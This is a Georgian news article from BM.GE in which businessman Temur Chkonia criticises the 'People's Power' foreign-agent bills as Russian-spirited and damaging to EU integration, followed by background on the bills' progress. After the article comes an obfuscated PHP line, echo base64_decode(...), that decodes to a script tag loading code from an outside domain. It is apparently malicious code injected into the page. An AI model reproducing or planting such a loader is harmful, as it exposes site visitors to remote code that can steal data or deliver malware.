celsiusi
ავერსი საქკაბელი

„ვფიქრობ, ეს რუსული სულისკვეთებით განმსჭვალული კანონია“ - ასე აფასებს საქართველოს პარლამენტში „ხალხის ძალის“ მიერ უცხოური გავლენის აგენტების შესახებ ინიცირებულ კანონპროექტებს მოქალაქე და ბიზნესმენი თემურ ჭყონია.

BM.GE-სთან საუბრისას ის ამბობს, რომ ამ კანონის მიღება მსოფლიოში დღეს არსებული მდგომარეობის გათვალისწინებით არ შეიძლება, მაშინ როდესაც ქვეყნის შიგნით საზოგადოების დიდი ნაწილი პროექტის დაკანონების წინააღმდეგია.

„სახელმწიფოში ისეთი პოლარიზაციაა, რომ ერთმა მოქალაქემ ამ კანონს მხოლოდ მეორის ჯიბრზე შეიძლება მხარი დაუჭიროს, რაც იმას ნიშნავს, რომ ეს კანონი, პირველ რიგში, ჩვენი ქვეყნისთვის არ არის მისაღები და მეორე - რა აუცილებელია, რომ ამ კანონს ასეთი ჯიბრიანი, სწრაფი განხილვები, დაძაბული სიტუაცია მოჰყვეს. ვფიქრობ, ეს კანონი რუსული სულისკვეთებით განმსჭვალულია, შეიძლება რაღაც პუნქტები არ ემთხვეოდეს, მაგრამ რუსული სულისკვეთება ბოლშევიზმთან არის დაკავშირებული და ამიტომაც არის ამხელა წინააღმდეგობა. როდესაც საუბრობენ, რომ ეს ამერიკული კანონია, ამერიკაში სენატორები ამბობენ, რომ ეს არ არის ამერიკული. ამერიკელი კანონმდებელი იძახიან, რომ ეს არ არის ამერიკული და ჩვენი კანონმდებლები იძახიან, რომ ამერიკულია“, - ამბობს ჭყონია.

თემურ ჭყონია თვლის, რომ კანონპროექტი უნდა იყოს შესწავლილი და კარგად განხილული. მისი შეფასებით, ეს კანონი ქვეყანას პოლიტიკურად და ეკონომიკურად არ გააძლიერებს.

„სანამ აზრთა სხვადასხვაობა არ დალაგდება იმ დონეზე, რომ კომფორტულად იგრძნოს საქართველოს მოქალაქემ თავი, მინდა დავაფიქსირო, ჩემი პოზიცია როგორც მოქალაქემ. ყველა მოქალაქეს, ვისაც საღი აზრი აქვს და გადალახავს მლიქვნელობას, იქნება სწორი შემფასებელი, ის სწორად შეაფასებს, რომ კანონი, რომელიც ჩვენ არ მოგვწონს იმ მდგომარეობაში არ უნდა ტარდებოდეს, რომელიც დღეს მსოფლიოშია - როდესაც რუსეთ-უკრაინის ომი მიმდინარეობს, როდესაც რუსეთთან ასე დაპირისპირებულია, ბორდერიზაცია გვაქვს... რუსეთი ჩვენ გვიკეთებს ყველაფერს, რაც მას უნდა და ჩვენ ყველაფერზე ვთანხმდებით, ეს სწორი პოზიცია არ არის. ეს კანონი უნდა შეჩერდეს, დაიწყოს სერიოზული შესწავლა, განხილვა, აზრის ჩამოყალიბება. ეს ის კანონი არ არის, რომელიც ქვეყანას ეკონომიკურად და პოლიტიკურად გააძლიერებს, მით უმეტეს მთელი მსოფლიოს პოლიტიკური ნაწილი გაცილებით კარგად ერკვევიან ამ კანონში, ვიდრე მათი ინიციატორები საქართველოში, ჩვენი კანონმდებლობა უდიდესი პასუხისმგებლობაა ქვეყნის წინაშე და ამ კანონს იღებენ ვიღაცის საწინააღმდეგოდ“, - აცხადებს თემურ ჭყონია.

მოქალაქე და ბიზნესმენი აცხადებს, რომ ის ამ კანონის მიღებას პირველ რიგში როგორც ქვეყნის მოქალაქე ისე არ ემხრობა. თემურ ჭყონიას შეფასებით, ამ კანონპროექტის მიღება ქვეყნის ევროინტეგრაციას დააზარალებს.

„ხალხი, რომელმაც ევროკავშირში უნდა მიგვიღოს, გვეუბნება, რომ ამ კანონით ევროკავშირში არ ვღებულობთ და ჩვენ რას ვპასუხობთ - „არ მღებულობ, ნუ მღებულობ“ - რა უფლებით აქვს თუნდაც 120 ადამიანს პარლამენტში, თუნდაც ოპოზიციას და პოზიციას ერთად შეკრებილთ 3 მილიონი ადამიანის ბედი გადაწყვიტონ? რა უფლება აქვთ გადაწყვიტონ ბედი, რომელიც ევროპას გვაშორებს, ვინ მისცათ ამის უფლება? რადგან ხალხმა აირჩია, იმას კი არ ნიშნავს, გააკეთონ ყველაფერი, რაც მათ სურთ. ისინი იმ გადასახედიდან ხედავენ, რა განათლებაც აქვთ.

მე - თემურ ჭყონია, როგორც მოქალაქე კატეგორიულად ვეწინააღმდეგები ისეთი კანონების მიღებას საქართველოში, რომელიც გზას უკეტავს ჩვენს ქვეყანას ევროინტეგრაციასა და მსოფლიო ინტეგრაციაში. როდესაც მთელი მსოფლიო გეუბნება, რომ ეს კანონი არ მომწონს, ჯიბრი საინტერესო არ არის. ერთმანეთს ეჯიბრებიან, რადგან თავისი აზრის დათმობა არ უნდათ“, - უთხრა BM.GE-ს ჭყონიამ.

ცნობისთვის: "ქართული ოცნების" პარტნიორმა გაერთიანებამ "ხალხის ძალამ" პარლამენტში ორი კვირის შუალედში უცხოური გავლენის აგენტების გამჭვირვალობის თაობაზე ორი კანონპროექტი დაარეგისტრირა. კანონპროექტის მიღების შემთხვევაში იმ მედიასაშუალებებსა და ორგანიზაციებს, რომლებიც დაფინანსების 20%-ზე მეტს უცხოური ორგანიზაციებისგან, მათ შორის საერთაშორისო დონორებისგან იღებენ, უცხოური გავლენის აგენტებად დარეგისტრირება მოუწევთ.

კანონპროექტს აშშ-ის, ევროკავშირისა და გაერთიანებული ერების ორგანიზაციის კრიტიკა მოჰყვა. ამის შემდეგ "ხალხის ძალამ" გადაწყვეტილება მიიღო, რომ წარადგინოს ალტერნატიული კანონპროექტი "უცხოური აგენტის რეგისტრაციის აქტის შესახებ", რომელიც მათივე განცხადებით, ამერიკული ვარიანტის ზუსტი ანალოგი და თარგმანია.

კანონპროექტის ინიციატორმა, ეკა სეფაშვილმა განაცხადა, რომ მმართველი გუნდი პირველი მოსმენით მხარს როგორც ქართულ, ისე ამერიკულ ვერსიას დაუჭერს. მისივე თქმით, ამის შემდეგ დოკუმენტი ვენეციის კომისიაში გაიგზავნება და პარლამენტი კომისიის შენიშვნებს გაითვალისწინებს.

აღსანიშნავია, რომ კანონპროექტები უკვე განიხილეს საგარეო ურთიერთობათა და თავდაცვისა და უშიშროების კომიტეტების ერთობლივ სხდომაზე და პირველი მოსმენით, პრინციპების დონეზე მხარიც დაუჭირეს. კანონპროექტებს დღეს იურიდიულ კომიტეტში განიხილავენ.

386
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");